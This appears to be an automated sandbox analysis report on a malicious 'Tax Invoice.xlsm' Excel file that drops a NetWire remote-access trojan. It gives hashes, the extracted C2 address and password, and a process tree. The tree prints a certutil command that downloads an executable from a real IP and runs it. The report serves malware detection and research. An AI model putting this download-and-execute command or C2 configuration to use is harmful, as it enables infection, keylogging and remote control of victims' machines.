Analysis
-
max time kernel
135s -
max time network
139s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system -
submitted
17-11-2022 04:52
Static task
static1
Behavioral task
behavioral1
Sample
Tax Invoice.xlsm
Resource
win7-20221111-en
General
-
Target
Tax Invoice.xlsm
-
Size
42KB
-
MD5
1a5f56600a34c20305f85f2cd0fdfbdf
-
SHA1
d37b42fd8d23e2fbdaebb55012fd028525e4e72c
-
SHA256
c0ca12020d7bf51209e7ac026fdfd71f55b97053985b061de24879069c96910c
-
SHA512
630cf26791900e941843a5e94308031c1e3dab8f60836e395e06f2c0a5fd11bf2beac5115429068276ff9fe1ffdb07d3a49b24029911da8016d490aadcc331d8
-
SSDEEP
768:IvjsCvCssn3uBIJYfTH+niSpKvDH7Nv+nWhFFiKk/f7qtNhTxRB+nE2g7d:IvDvCT3uG1ByT7Nv+qFFi3/jqLxxyE2g
Malware Config
Extracted
netwire
212.193.30.230:3345
-
activex_autorun
false
-
copy_executable
false
-
delete_original
false
-
host_id
HostId-%Rand%
-
keylogger_dir
%AppData%\Logs\
-
lock_executable
false
-
offline_keylogger
true
-
password
Password@9
-
registry_autorun
false
-
use_mutex
false
Signatures
-
NetWire RAT payload 4 IoCs
Processes:
resource yara_rule behavioral2/memory/1940-160-0x0000000000400000-0x0000000000433000-memory.dmp netwire behavioral2/memory/1940-163-0x0000000000400000-0x0000000000433000-memory.dmp netwire behavioral2/memory/1940-164-0x0000000000400000-0x0000000000433000-memory.dmp netwire behavioral2/memory/1940-165-0x0000000000400000-0x0000000000433000-memory.dmp netwire -
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
cmd.exedescription pid pid_target process target process Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 4308 2636 cmd.exe EXCEL.EXE -
Downloads MZ/PE file
-
Executes dropped EXE 2 IoCs
Processes:
Niipxzvceptnltqinb.exe.exeNiipxzvceptnltqinb.exe.exepid process 5084 Niipxzvceptnltqinb.exe.exe 1940 Niipxzvceptnltqinb.exe.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
Niipxzvceptnltqinb.exe.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation Niipxzvceptnltqinb.exe.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
Niipxzvceptnltqinb.exe.exedescription pid process target process PID 5084 set thread context of 1940 5084 Niipxzvceptnltqinb.exe.exe Niipxzvceptnltqinb.exe.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
EXCEL.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
EXCEL.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE -
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
EXCEL.EXEpid process 2636 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
powershell.exepid process 1444 powershell.exe 1444 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
Niipxzvceptnltqinb.exe.exepowershell.exedescription pid process Token: SeDebugPrivilege 5084 Niipxzvceptnltqinb.exe.exe Token: SeDebugPrivilege 1444 powershell.exe -
Suspicious use of SetWindowsHookEx 14 IoCs
Processes:
EXCEL.EXEpid process 2636 EXCEL.EXE 2636 EXCEL.EXE 2636 EXCEL.EXE 2636 EXCEL.EXE 2636 EXCEL.EXE 2636 EXCEL.EXE 2636 EXCEL.EXE 2636 EXCEL.EXE 2636 EXCEL.EXE 2636 EXCEL.EXE 2636 EXCEL.EXE 2636 EXCEL.EXE 2636 EXCEL.EXE 2636 EXCEL.EXE -
Suspicious use of WriteProcessMemory 27 IoCs
Processes:
EXCEL.EXEcmd.exeNiipxzvceptnltqinb.exe.execmd.exedescription pid process target process PID 2636 wrote to memory of 4308 2636 EXCEL.EXE cmd.exe PID 2636 wrote to memory of 4308 2636 EXCEL.EXE cmd.exe PID 4308 wrote to memory of 2108 4308 cmd.exe certutil.exe PID 4308 wrote to memory of 2108 4308 cmd.exe certutil.exe PID 4308 wrote to memory of 5084 4308 cmd.exe Niipxzvceptnltqinb.exe.exe PID 4308 wrote to memory of 5084 4308 cmd.exe Niipxzvceptnltqinb.exe.exe PID 4308 wrote to memory of 5084 4308 cmd.exe Niipxzvceptnltqinb.exe.exe PID 5084 wrote to memory of 4496 5084 Niipxzvceptnltqinb.exe.exe cmd.exe PID 5084 wrote to memory of 4496 5084 Niipxzvceptnltqinb.exe.exe cmd.exe PID 5084 wrote to memory of 4496 5084 Niipxzvceptnltqinb.exe.exe cmd.exe PID 4496 wrote to memory of 1540 4496 cmd.exe PING.EXE PID 4496 wrote to memory of 1540 4496 cmd.exe PING.EXE PID 4496 wrote to memory of 1540 4496 cmd.exe PING.EXE PID 5084 wrote to memory of 1444 5084 Niipxzvceptnltqinb.exe.exe powershell.exe PID 5084 wrote to memory of 1444 5084 Niipxzvceptnltqinb.exe.exe powershell.exe PID 5084 wrote to memory of 1444 5084 Niipxzvceptnltqinb.exe.exe powershell.exe PID 5084 wrote to memory of 1940 5084 Niipxzvceptnltqinb.exe.exe Niipxzvceptnltqinb.exe.exe PID 5084 wrote to memory of 1940 5084 Niipxzvceptnltqinb.exe.exe Niipxzvceptnltqinb.exe.exe PID 5084 wrote to memory of 1940 5084 Niipxzvceptnltqinb.exe.exe Niipxzvceptnltqinb.exe.exe PID 5084 wrote to memory of 1940 5084 Niipxzvceptnltqinb.exe.exe Niipxzvceptnltqinb.exe.exe PID 5084 wrote to memory of 1940 5084 Niipxzvceptnltqinb.exe.exe Niipxzvceptnltqinb.exe.exe PID 5084 wrote to memory of 1940 5084 Niipxzvceptnltqinb.exe.exe Niipxzvceptnltqinb.exe.exe PID 5084 wrote to memory of 1940 5084 Niipxzvceptnltqinb.exe.exe Niipxzvceptnltqinb.exe.exe PID 5084 wrote to memory of 1940 5084 Niipxzvceptnltqinb.exe.exe Niipxzvceptnltqinb.exe.exe PID 5084 wrote to memory of 1940 5084 Niipxzvceptnltqinb.exe.exe Niipxzvceptnltqinb.exe.exe PID 5084 wrote to memory of 1940 5084 Niipxzvceptnltqinb.exe.exe Niipxzvceptnltqinb.exe.exe PID 5084 wrote to memory of 1940 5084 Niipxzvceptnltqinb.exe.exe Niipxzvceptnltqinb.exe.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\Tax Invoice.xlsm"1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SYSTEM32\cmd.execmd /c certutil.exe -urlcache -split -f "http://192.3.194.246/ecs.exe" Niipxzvceptnltqinb.exe.exe && Niipxzvceptnltqinb.exe.exe2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\certutil.execertutil.exe -urlcache -split -f "http://192.3.194.246/ecs.exe" Niipxzvceptnltqinb.exe.exe3⤵
-
C:\Users\Admin\Documents\Niipxzvceptnltqinb.exe.exeNiipxzvceptnltqinb.exe.exe3⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c ping google.com4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\PING.EXEping google.com5⤵
- Runs ping.exe
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMQAwAA==4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Documents\Niipxzvceptnltqinb.exe.exeC:\Users\Admin\Documents\Niipxzvceptnltqinb.exe.exe4⤵
- Executes dropped EXE
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\Documents\Niipxzvceptnltqinb.exe.exeFilesize
7KB
MD5828988c5e283c07b481aae790b9f1664
SHA168240ab5ec927d8ee2af027110faee0f2531c828
SHA25644676f7732f4e6adfe2ba94d8e7dbaf4f6bf9d46f81118081f0f3a64f3fcb133
SHA5121a40e9d93a7689a9cce3bc3255b92cc2c9456efc6ebe246dfc6d2a8abeea137cd79469e0565a785bf6f4a2b79559297cf54b1e75d521b8a4df03e4cda6fe0a8d
-
C:\Users\Admin\Documents\Niipxzvceptnltqinb.exe.exeFilesize
7KB
MD5828988c5e283c07b481aae790b9f1664
SHA168240ab5ec927d8ee2af027110faee0f2531c828
SHA25644676f7732f4e6adfe2ba94d8e7dbaf4f6bf9d46f81118081f0f3a64f3fcb133
SHA5121a40e9d93a7689a9cce3bc3255b92cc2c9456efc6ebe246dfc6d2a8abeea137cd79469e0565a785bf6f4a2b79559297cf54b1e75d521b8a4df03e4cda6fe0a8d
-
C:\Users\Admin\Documents\Niipxzvceptnltqinb.exe.exeFilesize
7KB
MD5828988c5e283c07b481aae790b9f1664
SHA168240ab5ec927d8ee2af027110faee0f2531c828
SHA25644676f7732f4e6adfe2ba94d8e7dbaf4f6bf9d46f81118081f0f3a64f3fcb133
SHA5121a40e9d93a7689a9cce3bc3255b92cc2c9456efc6ebe246dfc6d2a8abeea137cd79469e0565a785bf6f4a2b79559297cf54b1e75d521b8a4df03e4cda6fe0a8d
-
memory/1444-157-0x0000000007DB0000-0x000000000842A000-memory.dmpFilesize
6.5MB
-
memory/1444-154-0x0000000005E90000-0x0000000005EF6000-memory.dmpFilesize
408KB
-
memory/1444-151-0x0000000000000000-mapping.dmp
-
memory/1444-152-0x0000000004F90000-0x0000000004FC6000-memory.dmpFilesize
216KB
-
memory/1444-158-0x0000000006A50000-0x0000000006A6A000-memory.dmpFilesize
104KB
-
memory/1444-153-0x00000000056F0000-0x0000000005D18000-memory.dmpFilesize
6.2MB
-
memory/1444-156-0x0000000006560000-0x000000000657E000-memory.dmpFilesize
120KB
-
memory/1444-155-0x0000000005F00000-0x0000000005F66000-memory.dmpFilesize
408KB
-
memory/1540-149-0x0000000000000000-mapping.dmp
-
memory/1940-165-0x0000000000400000-0x0000000000433000-memory.dmpFilesize
204KB
-
memory/1940-164-0x0000000000400000-0x0000000000433000-memory.dmpFilesize
204KB
-
memory/1940-163-0x0000000000400000-0x0000000000433000-memory.dmpFilesize
204KB
-
memory/1940-159-0x0000000000000000-mapping.dmp
-
memory/1940-160-0x0000000000400000-0x0000000000433000-memory.dmpFilesize
204KB
-
memory/2108-140-0x0000000000000000-mapping.dmp
-
memory/2636-138-0x00007FF80F3E0000-0x00007FF80F3F0000-memory.dmpFilesize
64KB
-
memory/2636-133-0x00007FF811CF0000-0x00007FF811D00000-memory.dmpFilesize
64KB
-
memory/2636-134-0x00007FF811CF0000-0x00007FF811D00000-memory.dmpFilesize
64KB
-
memory/2636-135-0x00007FF811CF0000-0x00007FF811D00000-memory.dmpFilesize
64KB
-
memory/2636-136-0x00007FF811CF0000-0x00007FF811D00000-memory.dmpFilesize
64KB
-
memory/2636-137-0x00007FF80F3E0000-0x00007FF80F3F0000-memory.dmpFilesize
64KB
-
memory/2636-132-0x00007FF811CF0000-0x00007FF811D00000-memory.dmpFilesize
64KB
-
memory/4308-139-0x0000000000000000-mapping.dmp
-
memory/4496-148-0x0000000000000000-mapping.dmp
-
memory/5084-146-0x00000000057C0000-0x0000000005852000-memory.dmpFilesize
584KB
-
memory/5084-141-0x0000000000000000-mapping.dmp
-
memory/5084-144-0x0000000000D90000-0x0000000000D98000-memory.dmpFilesize
32KB
-
memory/5084-145-0x0000000005D70000-0x0000000006314000-memory.dmpFilesize
5.6MB
-
memory/5084-150-0x0000000008970000-0x0000000008992000-memory.dmpFilesize
136KB
-
memory/5084-147-0x00000000068F0000-0x00000000068FA000-memory.dmpFilesize
40KB